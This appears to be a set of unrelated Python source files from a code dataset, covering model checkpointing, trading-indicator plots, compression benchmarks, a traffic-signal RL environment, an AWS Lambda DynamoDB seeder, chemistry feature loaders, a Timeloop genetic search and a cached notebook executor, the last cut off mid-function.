        self.check_point_params["lr_scheduler"] = lr_scheduler
        self.check_point_params["epoch"] = epoch
        # save to file
        torch.save(
            self.check_point_params,
            os.path.join(self.save_path, "checkpoint_{:0>3d}.pth".format(index)),
        )

    def save_model(self, model, best_flag=False, index=0, tag=""):
        """
        :params model: model to save
        :params best_flag: if True, the saved model is the one that gets best performance
        :params index: numeric suffix for non-best snapshots
        :params tag: optional filename prefix
        """
        # get state dict
        model = list2sequential(model)
        if isinstance(model, nn.DataParallel):
            model = model.module
        model = model.state_dict()
        if best_flag:
            if tag != "":
                torch.save(
                    model, os.path.join(self.save_path, "{}_best_model.pth".format(tag))
                )
            else:
                torch.save(model, os.path.join(self.save_path, "best_model.pth"))
        else:
            if tag != "":
                torch.save(
                    model,
                    os.path.join(
                        self.save_path, "{}_model_{:0>3d}.pth".format(tag, index)
                    ),
                )
            else:
                torch.save(
                    model,
                    os.path.join(self.save_path, "model_{:0>3d}.pth".format(index)),
                )
|
1691043
|
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import pandas as pd
import numpy as np
import argparse
import backtest
import indicators
import strategies
def main():
    """Plot an OHLC csv with optional indicators and strategy buy/sell markers."""
    parser = argparse.ArgumentParser()
    parser.add_argument("file")
    parser.add_argument("--sma", type=int, nargs='+', help='Adds SMA to the price graph')
    parser.add_argument("--ema", type=int, nargs='+', help='Adds EMA to the price graph')
    parser.add_argument("--rsi", type=int, help='Adds RSI in a subplot')
    parser.add_argument("--macd", type=int, nargs=3, help='Adds MACD in a subplot')
    parser.add_argument("--bbands", type=int, nargs=2, help='Adds Bollinger Bands to the price graph')
    parser.add_argument("--strategy", type=int, nargs='+', help='Adds a strategy, 1 : EMA Cross')
    args = parser.parse_args()

    ohlc = pd.read_csv(args.file, index_col='time', parse_dates=True)
    close = ohlc['close']

    # Number of subplots: the price graph plus one row each for RSI and MACD.
    rows = 1
    if args.rsi is not None:
        rows += 1
    if args.macd is not None:
        rows += 1
    fig = make_subplots(rows=rows, cols=1, shared_xaxes=True)

    # Price graph with moving averages (always row 1).
    row = 1
    fig.add_trace(go.Scatter(x=ohlc.index, y=close, name="Close"), row=row, col=1)
    if args.ema is not None:
        for period in args.ema:
            ema = indicators.EMA(close, period)
            fig.add_trace(go.Scatter(x=ohlc.index, y=ema.df['ema{}'.format(period)], name="EMA {}".format(period)), row=row, col=1)
    if args.sma is not None:
        for period in args.sma:
            sma = indicators.SMA(close, period)
            fig.add_trace(go.Scatter(x=ohlc.index, y=sma.df['sma{}'.format(period)], name="SMA {}".format(period)), row=row, col=1)
    # Bollinger Bands overlay the price graph, so they must NOT advance `row`.
    if args.bbands is not None:
        bbands = indicators.BollingerBands(close, args.bbands[0])
        fig.add_trace(go.Scatter(x=ohlc.index, y=bbands.df.ma), row=row, col=1)
        fig.add_trace(go.Scatter(x=ohlc.index, y=bbands.df.upper), row=row, col=1)
        fig.add_trace(go.Scatter(x=ohlc.index, y=bbands.df.lower), row=row, col=1)
        # BUG FIX: the original also incremented `row` here, which skipped a
        # subplot row (and overflowed `rows`) whenever --bbands was combined
        # with --rsi or --macd.
    row += 1

    # RSI subplot.
    if args.rsi is not None:
        rsi = indicators.RSI(close, args.rsi)
        fig.add_trace(go.Scatter(x=ohlc.index, y=rsi.df.rsi, name="RSI {}".format(args.rsi)), row=row, col=1)
        row += 1

    # MACD subplot.
    if args.macd is not None:
        macd = indicators.MACD(close, args.macd[0], args.macd[1], args.macd[2])
        fig.add_trace(go.Scatter(x=ohlc.index, y=macd.df.MACD, name="MACD {} {} {}".format(args.macd[0], args.macd[1], args.macd[2])), row=row, col=1)
        fig.add_trace(go.Scatter(x=ohlc.index, y=macd.df.signal, name="MACD Signal"), row=row, col=1)
        row += 1

    # Strategy buy/sell markers drawn on the price graph (row 1).
    if args.strategy is not None:
        if args.strategy[0] == 1:
            fast_ema = indicators.EMA(ohlc.close, period=args.strategy[1])
            slow_ema = indicators.EMA(ohlc.close, period=args.strategy[2])
            strategy = strategies.AvgCrossStrategy(ohlc.close, fast_ema.data(), slow_ema.data())
        elif args.strategy[0] == 2:
            macd = indicators.MACD(ohlc.close, args.strategy[1], args.strategy[2], args.strategy[3])
            strategy = strategies.MACDStrategy(ohlc.close, macd)
        elif args.strategy[0] == 3:
            bb1 = indicators.BollingerBands(ohlc.close, 20, 1)
            bb2 = indicators.BollingerBands(ohlc.close, 20, 2)
            strategy = strategies.DBBStrategy(ohlc.close, bb1, bb2)
        elif args.strategy[0] == 4:
            rsi = indicators.RSI(ohlc.close, 9)
            macd = indicators.MACD(ohlc.close, 12, 26, 9)
            strategy = strategies.RSIMACDStrategy(ohlc.close, rsi, macd)
        else:
            strategy = None
        # All strategies expose the same signals['positions'] interface, so the
        # marker plotting (previously duplicated per branch) is shared.
        if strategy is not None:
            fig.add_trace(go.Scatter(x=close.loc[strategy.signals['positions'] == 1.0].index, y=close.loc[strategy.signals['positions'] == 1.0],
                                     mode='markers', marker=dict(size=12, symbol='triangle-up', color='green'), name="Buy"), row=1, col=1)
            fig.add_trace(go.Scatter(x=close.loc[strategy.signals['positions'] == -1.0].index, y=close.loc[strategy.signals['positions'] == -1.0],
                                     mode='markers', marker=dict(size=12, symbol='triangle-down', color='red'), name="Sell"), row=1, col=1)

    fig.show()


if __name__ == "__main__":
    main()
|
1691054
|
import os
import sys
from pathlib import Path
from helpers.generator import generate_files
from helpers.files import download_file, CompressionResult, discover, FileData
# Add the engine directory to the path of importable directories
engine_path = os.getcwd() + "/engine"
sys.path.append(engine_path)
from engine import engine
def benchmark(training_set, downloads, algorithms, generate=False, download=False, fresh=False, delete_at_end=False):
    """Run compression benchmarks over generated and/or downloaded files.

    :param training_set: spec forwarded to generate_files when generate=True
    :param downloads: list of (url, unzip) tuples fetched when download=True
    :param algorithms: compression algorithm identifiers to benchmark
    :param generate: generate synthetic test files
    :param download: download the files listed in `downloads`
    :param fresh: delete any pre-existing files in ./files first
    :param delete_at_end: remove the benchmark files when done (also on error)
    :return: dict with a "files" list of serialized per-file results
    """
    Path("files").mkdir(parents=True, exist_ok=True)
    os.chdir("files")
    filenames = discover()
    if fresh:
        for filename in filenames:
            os.remove(filename)
        filenames = []
    if generate:
        filenames += generate_files(training_set)
    if download:
        for url, unzip in downloads:
            filenames += download_file(url, unzip=unzip)
    files = [FileData(filename) for filename in filenames]
    try:
        data = benchmark_files(files, algorithms)
    except Exception:
        # Clean up before re-raising so a failed run leaves no stale files.
        if delete_at_end:
            print("Exception occured, cleaning up files")
            for file in files:
                file.delete()
        raise
    for file in files:
        if delete_at_end:
            file.delete()
    os.chdir("..")
    # BUG FIX: the original `"a" + "b" if cond else ""` parsed as
    # `("ab") if cond else ""`, printing an empty line when not deleting.
    print("Finished benchmarks" + (" and cleaned up files" if delete_at_end else ""))
    print("Converting to dict/array-based objects for serialization...")
    serialized_files = []
    for result in data:
        serialized_file = {
            "name": result.file.filename,
            "type": result.file.filetype,
            "entropy": result.file.entropy,
            "size": result.file.size,
            "best_result": clean_fields(result.best_result()),
            "results": [clean_fields(r) for r in result.results],
        }
        serialized_files.append(serialized_file)
    return {"files": serialized_files}
def clean_fields(compression_result):
    """Map an engine CompressionResult's Go-style fields to snake_case keys."""
    result = compression_result
    return dict(
        engine=result.CompressionEngine,
        time_taken=result.TimeTaken,
        compressed_ratio=result.Ratio,
        entropy=result.Entropy,
        compressed_entropy=result.ActualEntropy,
        lossless=result.Lossless,
        failed=result.Failed,
    )
def benchmark_files(files, algorithms):
    """Benchmark every algorithm against every file via the compression engine.

    :param files: list of FileData wrappers
    :param algorithms: algorithm identifiers understood by engine.BenchmarkFile
    :return: list of CompressionResult, one per file
    """
    data = []
    # Engine settings: run quietly and do not write compressed output files.
    settings = engine.Settings(WriteOutFiles=False, PrintStatus=False, PrintStats=False)
    for file in files:
        results = []
        for algorithm in algorithms:
            try:
                print(f"Running {algorithm} on {file.filename}")
                results.append(engine.BenchmarkFile(algorithm, file.filename, settings))
            except Exception as e:
                # Best-effort: one failing algorithm must not abort the run.
                print("Exception occured: " + str(e))
        data.append(CompressionResult(file, results))
    # Get best algorithm
    for result in data:
        best_result = result.best_result()
        print(f"{result.file.filename} - {best_result.Ratio} - {best_result.CompressionEngine}")
    return data
|
1691141
|
import gym
from typing import Dict
from ding.envs import BaseEnv
from ding.envs.common import EnvElement
ALL_ACTION_TYPE = set(['change'])
class SumoAction(EnvElement):
    r"""
    Overview:
        the action element of Sumo enviroment
    Interface:
        _init, _from_agent_processor
    """
    _name = "SumoAction"

    def _init(self, env: BaseEnv, cfg: Dict) -> None:
        r"""
        Overview:
            init the sumo action environment with the given config file
        Arguments:
            - cfg(:obj:`EasyDict`): config, you can refer to `envs/sumo_wj3_default_config.yaml`
        """
        self._env = env
        self._cfg = cfg
        action_shape = []
        self._action_type = cfg.action_type
        assert self._action_type in ALL_ACTION_TYPE
        self._use_multi_discrete = cfg.use_multi_discrete
        # One discrete action dimension per traffic-light crossing.
        for tl, cross in self._env.crosses.items():
            if self._action_type == 'change':
                action_shape.append(cross.phase_num)
            else:
                # TODO: add switch action
                raise NotImplementedError
        if self._use_multi_discrete:
            self._shape = len(action_shape)
            self._space = gym.spaces.MultiDiscrete(action_shape)
        else:
            # TODO: add naive discrete action
            raise NotImplementedError
        # NOTE(review): 'max' uses only the first crossing's phase count --
        # confirm this is intended when crossings have different phase_num.
        self._value = {
            'min': 0,
            'max': action_shape[0],
            'dtype': int,
        }

    def _from_agent_processor(self, data: Dict) -> Dict:
        r"""
        Overview:
            Convert per-crossing agent actions into yellow/green phase indices.
        """
        # TODO: add switch action
        action = {k: {} for k in data.keys()}
        for k, v in data.items():
            act, last_act = v['action'], v['last_action']
            # Insert a yellow phase only when the chosen action changes.
            if last_act is not None and act != last_act:
                yellow_phase = self._env.crosses[k].get_yellow_phase_index(last_act)
            else:
                yellow_phase = None
            action[k]['yellow'] = yellow_phase
            action[k]['green'] = self._env.crosses[k].get_green_phase_index(act)
        return action

    # override
    def _details(self):
        return 'action dim: {}'.format(self._shape)

    @property
    def space(self):
        return self._space
|
1691159
|
import json
import csv
import random
import boto3
from botocore.vendored import requests
def lambda_handler(event, context):
    """CloudFormation custom-resource handler seeding the UserProfile table.

    On create/update: reads the user id list from S3 and writes one default
    profile per user into DynamoDB. On delete: only acknowledges CFN.
    The outcome is always reported back via send_response.
    """
    try:
        # Load the user id list from S3.
        s3 = boto3.resource('s3')
        bucket = s3.Bucket('gamingonaws2018')
        obj = bucket.Object(key='userList.csv')
        response = obj.get()
        users = response['Body'].read().split()
        # Target DynamoDB table.
        dynamodb = boto3.resource('dynamodb')
        table = dynamodb.Table('UserProfile')
        uclass = ['warrior', 'mage', 'healer']
        if event['RequestType'] == 'Delete':
            print('Send response to CFN.')
            send_response(event, context, "SUCCESS", {"Message": "CFN deleted!"})
        else:
            for user in users:
                response = table.put_item(
                    Item={
                        'pidx': int(user),
                        'ulevel': 1,
                        'uclass': random.choice(uclass),
                        'utimestamp': '2000-01-01 00:00:00.000000'
                    }
                )
            print('Send response to CFN.')
            send_response(event, context, "SUCCESS", {"Message": "CFN created!"})
        print('End of Lambda function.')
    except Exception:
        # BUG FIX: the original used Python 2 `print` statements and a bare
        # `except:`; catching Exception lets SystemExit/KeyboardInterrupt
        # propagate while still reporting the failure to CloudFormation.
        send_response(event, context, "FAILED", {"Message": "Lambda failed!"})
def send_response(event, context, response_status, response_data):
    """PUT a CloudFormation custom-resource response to the pre-signed URL."""
    payload = {
        "Status": response_status,
        "Reason": "See the details in CloudWatch Log Stream: " + context.log_stream_name,
        "PhysicalResourceId": context.log_stream_name,
        "StackId": event['StackId'],
        "RequestId": event['RequestId'],
        "LogicalResourceId": event['LogicalResourceId'],
        "Data": response_data,
    }
    body = json.dumps(payload)
    # CloudFormation expects an empty Content-Type and an explicit length.
    requests.put(
        event["ResponseURL"],
        headers={"Content-Type": "", "Content-Length": str(len(body))},
        data=body,
    )
|
1691201
|
import warnings

from ibllib.misc import logger_config

# Always surface ibllib's own deprecation warnings to users.
warnings.filterwarnings('always', category=DeprecationWarning, module='ibllib')

# if this becomes a full-blown library we should let the logging configuration to the discretion of the dev
# who uses the library. However since it can also be provided as an app, the end-users should be provided
# with an useful default logging in standard output without messing with the complex python logging system
# -*- coding:utf-8 -*-
import logging

USE_LOGGING = True
#%(asctime)s,%(msecs)d
if USE_LOGGING:
    logger_config(name='ibllib')
else:
    # deactivate all log calls for use as a library
    logging.getLogger('ibllib').addHandler(logging.NullHandler())

# ONE-api is a required runtime dependency; log (rather than raise) so the
# import of ibllib itself still succeeds.
try:
    import one
except ModuleNotFoundError:
    logging.getLogger('ibllib').error('Missing dependency, please run `pip install ONE-api`')
|
1691217
|
import csv
import os
import pickle
from typing import List
import numpy as np
import pandas as pd
from rdkit import Chem
from rdkit.Chem import PandasTools
def save_features(path: str, features: List[np.ndarray]) -> None:
    """Save molecule features to a compressed ``.npz`` file.

    The arrays are stored under the single key ``"features"`` so that
    :func:`load_features` can recover them.

    :param path: Destination ``.npz`` path.
    :param features: List of 1D numpy feature arrays, one per molecule.
    """
    np.savez_compressed(path, features=features)
def load_features(path: str) -> np.ndarray:
    """Load molecule features saved in one of several formats.

    Supported: ``.npz`` (array stored under key "features"), ``.npy``,
    ``.csv``/``.txt`` (comma-separated with a header row, one molecule per
    line), and ``.pkl``/``.pckl``/``.pickle`` holding sparse arrays.

    .. note::
        All formats assume the SMILES loaded elsewhere in the code are in
        the same order as the features loaded here.

    :param path: Path to the features file.
    :return: 2D array of shape ``(num_molecules, features_size)``.
    """
    ext = os.path.splitext(path)[1]
    if ext == '.npz':
        return np.load(path)['features']
    if ext == '.npy':
        return np.load(path)
    if ext in ('.csv', '.txt'):
        with open(path) as f:
            rows = csv.reader(f)
            next(rows)  # skip header
            return np.array([[float(value) for value in row] for row in rows])
    if ext in ('.pkl', '.pckl', '.pickle'):
        with open(path, 'rb') as f:
            return np.array([np.squeeze(np.array(feat.todense())) for feat in pickle.load(f)])
    raise ValueError(f'Features path extension {ext} not supported.')
def load_valid_atom_features(path: str, smiles: List[str]) -> List[np.ndarray]:
    """
    Loads atom-wise features saved in a variety of formats.

    Supported formats:

    * :code:`.npz` descriptors are saved as 2D array for each molecule in the order of that in the data.csv
    * :code:`.pkl` / :code:`.pckl` / :code:`.pickle` containing a pandas dataframe with smiles as index and numpy array of descriptors as columns
    * :code:'.sdf' containing all mol blocks with descriptors as entries

    :param path: Path to file containing atomwise features.
    :param smiles: Molecule SMILES strings used to align features (SDF path).
    :return: A list of 2D arrays, one per molecule.
    """
    extension = os.path.splitext(path)[1]
    if extension == '.npz':
        features = np.load(path)
        container = np.load(path)
        features = [container[key] for key in container]
    elif extension in ['.pkl', '.pckl', '.pickle']:
        features_df = pd.read_pickle(path)
        # 1D cells: one value per atom per column -> stack columns into (atoms, cols).
        if features_df.iloc[0, 0].ndim == 1:
            features = features_df.apply(lambda x: np.stack(x.tolist(), axis=1), axis=1).tolist()
        # 2D cells: per-column (atoms, k) arrays -> concatenate along feature axis.
        elif features_df.iloc[0, 0].ndim == 2:
            features = features_df.apply(lambda x: np.concatenate(x.tolist(), axis=1), axis=1).tolist()
        else:
            raise ValueError(f'Atom descriptors input {path} format not supported')
    elif extension == '.sdf':
        features_df = PandasTools.LoadSDF(path).drop(['ID', 'ROMol'], axis=1).set_index('SMILES')
        features_df = features_df[~features_df.index.duplicated()]
        # locate atomic descriptors columns (comma-separated per-atom value strings)
        features_df = features_df.iloc[:, features_df.iloc[0, :].apply(lambda x: isinstance(x, str) and ',' in x).to_list()]
        # Align rows to the caller-provided SMILES order.
        features_df = features_df.reindex(smiles)
        if features_df.isnull().any().any():
            raise ValueError('Invalid custom atomic descriptors file, Nan found in data')
        features_df = features_df.applymap(lambda x: np.array(x.replace('\r', '').replace('\n', '').split(',')).astype(float))
        # Truncate by number of atoms
        num_atoms = {x: Chem.MolFromSmiles(x).GetNumAtoms() for x in features_df.index.to_list()}

        def truncate_arrays(r):
            # Keep only the first num_atoms values for this row's molecule.
            return r.apply(lambda x: x[:num_atoms[r.name]])

        features_df = features_df.apply(lambda x: truncate_arrays(x), axis=1)
        features = features_df.apply(lambda x: np.stack(x.tolist(), axis=1), axis=1).tolist()
    else:
        raise ValueError(f'Extension "{extension}" is not supported.')
    return features
|
1691250
|
from __future__ import unicode_literals
import frappe
def execute():
    """Patch: (re)install fixtures when the WA State Classifications group is missing."""
    if not frappe.db.exists("Item Group", {'item_group_name': 'WA State Classifications'}):
        # Deferred import: after_install pulls in the full install machinery.
        from erpnext_biotrack.install.after_install import install_fixtures
        install_fixtures()
|
1691264
|
import pytest
from pymongo_migrate.generate import slugify
@pytest.mark.parametrize(
    "test_input,expected",
    [
        ("My comment", "my_comment"),
        ("counting: 1, 2, 3", "counting_1_2_3"),
        ("wat?!", "wat"),
        ("<NAME>", "may_wik"),
    ],
)
def test_slugify(test_input, expected):
    # slugify lowercases, joins words with "_" and drops punctuation
    # (per the expectations above).
    assert slugify(test_input) == expected
|
1691304
|
import numpy as np
import yaml
import os, sys
import copy
from functools import reduce
import random
from timeloop_env import TimeloopEnv
from multiprocessing.pool import Pool
from multiprocessing import cpu_count
import shutil
from functools import cmp_to_key, partial
class GammaTimeloopEnv(object):
def __init__(self, num_pes=256, l2_size=10800, l1_size=512, fitness_obj=['latency'], report_dir='./report', use_pool=True):
self.fitness_obj = fitness_obj
self.num_pes = num_pes
self.l1_size = l1_size
self.l2_size = l2_size
self.loc_to_dim_note = {0: 'K', 1: 'C', 2: 'Y', 3: 'X', 4: 'R', 5: 'S'}
self.dim_note = ['K', 'C', 'Y', 'X', 'R', 'S']
self.len_dimension = len(self.dim_note)
self.timeloop_configfile_path = './out_config'
self.report_dir = report_dir
self.timeloop_env = TimeloopEnv(config_path=self.timeloop_configfile_path)
self.use_pool = use_pool
def set_dimension(self, dimension):
self.dimension = dimension
self.dimension_dict = self.get_dimension_dict(dimension)
self.dimension_factor = self.get_dimension_factors(self.dimension_dict)
def get_dimension_dict(self, dim_value):
return {note: value for note, value in zip(self.dim_note, dim_value)}
def get_factors(self, n):
return list(reduce(list.__add__,
([i, n // i] for i in range(1, int(n ** 0.5) + 1) if n % i == 0)))
def get_dimension_factors(self, dimension_dict):
dimension_factors = dict()
for key, value in dimension_dict.items():
factors = self.get_factors(value)
dimension_factors[key] = factors
return dimension_factors
def mutate_tiles(self, pops, parents, alpha=0.5, num_mu_loc=1):
len_parents = len(parents)
for i in range(len(pops)):
if random.random() < alpha:
sel_parent = random.randint(0, len_parents - 1)
indv = copy.deepcopy(parents[sel_parent])
l2_tile_size = indv['l2_tile_size']
l1_tile_size = indv['l1_tile_size']
for _ in range(num_mu_loc):
pick_loc = random.randint(0, self.len_dimension - 1)
pick_dim = self.loc_to_dim_note[pick_loc]
dim_value = self.dimension_dict[pick_dim]
factors = self.dimension_factor[pick_dim]
pick_factor_l2 = np.random.choice(factors)
pick_factor_l1 = np.random.choice(self.get_factors(dim_value//pick_factor_l2))
l2_tile_size[pick_loc] = pick_factor_l2
l1_tile_size[pick_loc] = pick_factor_l1
pops[i] = indv
return pops
def mutate_par(self, pops, parents, alpha=0.5):
len_parents = len(parents)
for i in range(len(pops)):
if random.random() < alpha:
sel_parent = random.randint(0, len_parents - 1)
indv = copy.deepcopy(parents[sel_parent])
pick_loc = random.randint(0, 1)
par_dims = indv['par_dims']
par_dims[pick_loc] = np.random.choice(self.dim_note)
pops[i] = indv
return pops
def mutate_order(self, pops, parents, alpha=0.5):
len_parents = len(parents)
for i in range(len(pops)):
if random.random() < alpha:
sel_parent = random.randint(0, len_parents - 1)
indv = copy.deepcopy(parents[sel_parent])
if random.random()<0.5:
pick = 'l2_loop_order'
else:
pick = 'l1_loop_order'
loop_order = indv[pick]
loop_order = list(loop_order)
idxs = random.sample(set(np.arange(0, self.len_dimension)), 2)
loop_order[idxs[0]], loop_order[idxs[1]] = loop_order[idxs[1]], loop_order[idxs[0]]
indv[pick] = ''.join(loop_order)
pops[i] = indv
return pops
def init_indv(self):
indv = {'l2_tile_size': [1]*6,
'l1_tile_size': [1]*6,
'l2_loop_order': 'KCYXRS',
'l1_loop_order': 'KCYXRS',
'par_dims': ['K', 'C']}
return indv
def init_pops(self, num_pops):
# return [self.init_indv() for _ in range(num_pops)], np.random.randint(0, 100, (num_pops, len(self.fitness_obj)))
return [self.init_indv() for _ in range(num_pops)], np.ones((num_pops, len(self.fitness_obj))) * np.NINF
def sort_rank_func(self, cand1, cand2, delta=1e-2):
def helper(item1, item2, is_last=False):
margin = abs((item1+item2) /2 * delta) if not is_last else 0
if margin == float('Inf'):
margin = 0
if item1 >= item2 + margin:
return 1
elif item1 +margin < item2:
return -1
else:
return 0
fitness_len = len(cand1) - 1
for i in range(fitness_len):
ret = helper(cand1[i], cand2[i], is_last=(i==fitness_len-1))
if ret != 0:
return ret
def select_parents(self, pops, fitness, num_parents, num_elites, num_pops, use_soft_margin=True):
fitness_list = [tuple(list(ar)+[-i]) for i, ar in enumerate(fitness)]
if not use_soft_margin:
sort_rank_func = partial(self.sort_rank_func, delta=0)
else:
sort_rank_func = self.sort_rank_func
fitness_list = sorted(fitness_list, key=cmp_to_key(sort_rank_func), reverse=True)
idx = [int(-ar[-1]) for ar in fitness_list]
new_pop = [pops[i] for i in idx][:num_pops]
new_fitness = fitness[idx][:num_pops]
parents = copy.deepcopy(new_pop[:num_parents])
elites = copy.deepcopy(new_pop[:num_elites])
elites_fitness = copy.deepcopy(new_fitness[:num_elites])
return new_pop, new_fitness, parents, elites, elites_fitness
def thread_fun(self, indv, pool_idx=0):
self.timeloop_env.create_timeloop_config(self.dimension, self.l2_size, self.l1_size, self.num_pes,
indv['l2_tile_size'], indv['l1_tile_size'], indv['l2_loop_order'],
indv['l1_loop_order'], indv['par_dims'], pool_idx=pool_idx)
fit = self.timeloop_env.run_timeloop(pool_idx=pool_idx, fitness_obj=self.fitness_obj)
return fit
def evaluate(self, pops, fitness, pool=None):
if not pool:
for i, indv in enumerate(pops):
fitness[i] = self.thread_fun(indv)
else:
rets = pool.starmap(self.thread_fun, zip(pops, np.arange(len(pops))))
fitness = np.array(rets)
return fitness
def create_timeloop_report(self, indv, dir_path='./report'):
fitness = self.thread_fun(indv, pool_idx=0)
os.makedirs(dir_path, exist_ok=True)
os.system(f'cp -d -r {os.path.join(self.timeloop_configfile_path, "pool-0")}/* {dir_path}')
with open(os.path.join(dir_path,'Gamma-Timeloop.txt'), 'w') as fd:
fd.write(f'Achieved Fitness: {fitness}')
fd.write(f'GammaTimeloop-style Sol: {self.get_genome(indv)}')
fd.write(f'Gamma-style Sol: {self.get_maestro_style_genome(indv)}')
def run(self, dimension, num_pops=100, num_gens=100, elite_ratio=0.05, parents_ratio=0.4):
self.set_dimension(dimension)
num_parents = int(num_pops*parents_ratio)
num_elites = max(1, int(num_pops*elite_ratio))
pops, fitness = self.init_pops(num_pops)
if self.use_pool:
pool = Pool(num_pops)
self.timeloop_env.create_pool_env(num_pops)
else:
pool = None
for g in range(num_gens):
if g == 0:
pops, fitness, parents, elites, elites_fitness = self.select_parents(pops, fitness, num_parents, num_elites, num_pops)
if g == 0:
alpha = 1
else:
alpha = 0.5
pops = self.mutate_par(pops, parents, alpha=alpha)
pops = self.mutate_order(pops, parents, alpha=alpha)
pops = self.mutate_tiles(pops, parents, alpha=alpha)
fitness = self.evaluate(pops, fitness, pool)
pops = elites + pops
fitness = np.concatenate((elites_fitness, fitness), axis=0)
pops, fitness, parents, elites, elites_fitness = self.select_parents(pops, fitness, num_parents, num_elites, num_pops)
best_idx = 0
best_sol = pops[best_idx]
print(f'[Gen{g}] fitness: {fitness[best_idx]} Sol: {self.get_genome(best_sol)}')
print(f'Achieved Fitness: {fitness[best_idx]}')
print(f'GammaTimeloop-style Sol: {self.get_genome(best_sol)}')
print(f'Gamma-style Sol: {self.get_maestro_style_genome(best_sol)}')
self.create_timeloop_report(best_sol, dir_path=self.report_dir)
self.clean_timeloop_output_files()
def get_genome(self, indv):
l2_tile_size, l1_tile_size = indv['l2_tile_size'], indv['l1_tile_size']
l2_loop_order, l1_loop_order = indv['l2_loop_order'],indv['l1_loop_order']
l2_par, l1_par = indv['par_dims']
l2_tile_dict = self.get_dimension_dict(l2_tile_size)
l1_tile_dict = self.get_dimension_dict(l1_tile_size)
genome_l2 = [[l2_par, self.num_pes]] + [[d, l2_tile_dict[d]] for d in l2_loop_order]
genome_l1 = [[l1_par, 1]] + [[d, l1_tile_dict[d]] for d in l1_loop_order]
genome = genome_l2 + genome_l1
return genome
def get_maestro_style_genome(self, indv):
l2_tile_size, l1_tile_size = indv['l2_tile_size'], indv['l1_tile_size']
l2_tile_size = [l2 * l1 for l2, l1 in zip(l2_tile_size, l1_tile_size)]
l2_loop_order, l1_loop_order = indv['l2_loop_order'],indv['l1_loop_order']
l2_par, l1_par = indv['par_dims']
l2_tile_dict = self.get_dimension_dict(l2_tile_size)
l1_tile_dict = self.get_dimension_dict(l1_tile_size)
l1_cluster_size = l1_tile_dict[l1_par]
l1_tile_dict[l1_par] = 1
l2_cluster_size = self.num_pes // l1_cluster_size
l2_tile_dict[l2_par] = max(1, l2_tile_dict[l2_par] // l2_cluster_size)
genome_l2 = [[l2_par, self.num_pes]] + [[d, l2_tile_dict[d]] for d in l2_loop_order]
genome_l1 = [[l1_par, l1_cluster_size]] + [[d, l1_tile_dict[d]] for d in l1_loop_order]
genome = genome_l2 + genome_l1
return genome
def clean_timeloop_output_files(self):
    """Delete the per-run timeloop config directory and everything inside it.

    The per-file cleanup of individual `timeloop-model.*` outputs that used
    to live here (commented out) was dead code and has been removed; the
    whole config directory is removed in one call instead.
    """
    shutil.rmtree(self.timeloop_configfile_path)
|
1691317
|
import argparse
import codecs
import datetime
import hashlib
import inspect
import logging
import os
import sys
import time
import traceback
import warnings
import dill
import nbformat as nbf
from jupyter_client.kernelspec import KernelSpecManager
from nbconvert import HTMLExporter
from nbconvert.preprocessors import ExecutePreprocessor
from nbconvert.preprocessors.execute import CellExecutionError
from pynb.utils import get_func, fatal, check_isfile
from pynb.version import __version__
logging.basicConfig(level=logging.INFO)
class CachedExecutePreprocessor(ExecutePreprocessor):
    """
    Extends .run_cell to support cached execution of cells.

    Each cell's returned value and the kernel session after running it are
    serialized with dill to /tmp, keyed by a short hash of
    (notebook uid, cell source, cell index).  An unchanged prefix of the
    notebook can then be replayed from disk instead of re-executed.
    """

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # True while the executed prefix still matches the on-disk cache;
        # set to False at the first cell that has to be re-run.
        self.cache_valid = True
        # Session dump of the most recently cached cell (cache side).
        self.prev_fname_session = None
        # Session dump that has actually been loaded into the kernel.
        self.prev_fname_session_loaded = None
        self.disable_cache = False  # when True: never read or write the cache
        self.ignore_cache = False   # when True: recompute, but still write cache
        self.uid = None             # notebook identity mixed into every cell hash

    def cell_hash(self, cell, cell_index):
        """
        Compute cell hash based on cell index and cell content

        :param cell: cell to be hashed
        :param cell_index: cell index
        :return: hash string
        """
        s = '{uid} {cell} {index}'.format(uid=self.uid,
                                          cell=str(cell.source),
                                          index=cell_index).encode('utf-8')
        # 8 hex chars of SHA-1 are enough to key the /tmp cache files.
        # (note: 'hash' shadows the builtin; kept as-is.)
        hash = hashlib.sha1(s).hexdigest()[:8]
        return hash

    def run_cell(self, cell, cell_index=0, store_history=True):
        """
        Run cell with caching

        :param cell: cell to run
        :param cell_index: cell index (optional)
        :param store_history: ignored but required because expected from Jupyter executor (optional)
        :return: the cell's execution result (same shape as ExecutePreprocessor.run_cell)
        """
        hash = self.cell_hash(cell, cell_index)
        fname_session = '/tmp/pynb-cache-{}-session.dill'.format(hash)
        fname_value = '/tmp/pynb-cache-{}-value.dill'.format(hash)
        # Whitespace-collapsed prefix of the cell source, for log readability.
        cell_snippet = str(" ".join(cell.source.split())).strip()[:40]

        if self.disable_cache:
            logging.info('Cell {}: Running: "{}.."'.format(hash, cell_snippet))
            return super().run_cell(cell, cell_index)

        if not self.ignore_cache:
            # Cache hit: both the session and value dumps must exist and the
            # whole prefix up to here must have matched the cache.
            if self.cache_valid and os.path.isfile(fname_session) and os.path.isfile(fname_value):
                logging.info('Cell {}: Loading: "{}.."'.format(hash, cell_snippet))
                self.prev_fname_session = fname_session
                with open(fname_value, 'rb') as f:
                    value = dill.load(f)
                return value

        # If cache does not exist or not valid:
        #
        # 1) Invalidate subsequent cell caches
        # 2) Load session from previous cached cell (if existing)
        # 3) Run cell
        # 4) Cache cell session
        # 5) Cache cell value

        logging.info('Cell {}: Running: "{}.."'.format(hash, cell_snippet))

        # 1) Invalidate subsequent cell caches
        self.cache_valid = False

        # 2) Load session from previous cached cell (if existing and required)
        if self.prev_fname_session:
            if self.prev_fname_session_loaded != self.prev_fname_session:
                self.session_load(hash, self.prev_fname_session)

        # 2) Run cell
        value = super().run_cell(cell, cell_index)

        # We make sure that injected cells do not interfere with the cell index...
        # value[0]['content']['execution_count'] = cell_index

        # 3) Cache cell session
        cached = self.session_dump(cell, hash, fname_session)

        # 4) Cache cell value, if no errors while dumping the cell session in 3).
        if cached:
            self.prev_fname_session_loaded = fname_session
            self.prev_fname_session = fname_session
            logging.debug('Cell {}: dumping value to {}'.format(hash, fname_value))
            with open(fname_value, 'wb') as f:
                dill.dump(value, f)
            logging.debug('Cell {}: cached'.format(hash))

        return value

    def session_load(self, hash, fname_session):
        """
        Load ipython session from file

        Works by injecting and executing a hidden cell that calls
        dill.load_session inside the kernel.

        :param hash: cell hash (used only for logging)
        :param fname_session: pathname to dumped session
        :return:
        """
        logging.debug('Cell {}: loading session from {}'.format(hash, fname_session))

        # 'dill.settings["recurse"] = True',
        # 'dill.settings["byref"] = True',

